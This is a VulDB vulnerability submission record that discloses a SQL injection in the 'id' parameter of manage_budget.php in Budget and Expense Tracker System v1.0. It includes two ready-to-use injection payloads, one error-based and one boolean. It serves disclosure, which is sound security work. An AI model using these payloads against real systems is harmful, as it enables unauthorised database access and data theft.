| Title | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Budget and Expense Tracker System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /expense_budget/admin/budget/manage_budget.php?id.
Payload1: id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a
Payload2: id=1' and 777=777 and 'GSD'='GSD |
|---|
| Source | ⚠️ https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
|---|
| User | wucwu1 (UID 46807) |
|---|
| Submission | 05/17/2023 03:38 (3 years ago) |
|---|
| Moderation | 05/17/2023 18:53 (15 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID sql injection] |
|---|
| Points | 20 |
|---|